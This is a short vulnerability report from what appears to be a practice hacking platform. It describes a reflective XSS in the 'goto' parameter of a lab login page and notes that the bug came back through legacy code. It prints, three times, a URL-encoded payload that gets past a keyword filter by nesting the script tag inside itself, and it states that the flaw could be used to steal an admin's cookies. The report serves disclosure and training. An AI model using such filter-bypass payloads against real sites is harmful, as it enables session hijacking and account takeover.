FirstBlood-#420 — Reflective XSS on login.php
This issue was discovered on FirstBlood v2
On 2021-10-25, shivam18u Level 3 reported:
Hi Sean,
I found a reflective XSS on login.php page using a hidden parameter goto.
By visiting the link https://20380f62fd41-shivam18u.a.firstbloodhackers.com/login.php?goto=hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E
, the xss can be triggered.
Payload: hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E
By using a script stored on a remote server, you can bypass the filters.
This can be used to steal admin's cookies.
Have a nice day!
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (
ID 39
), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.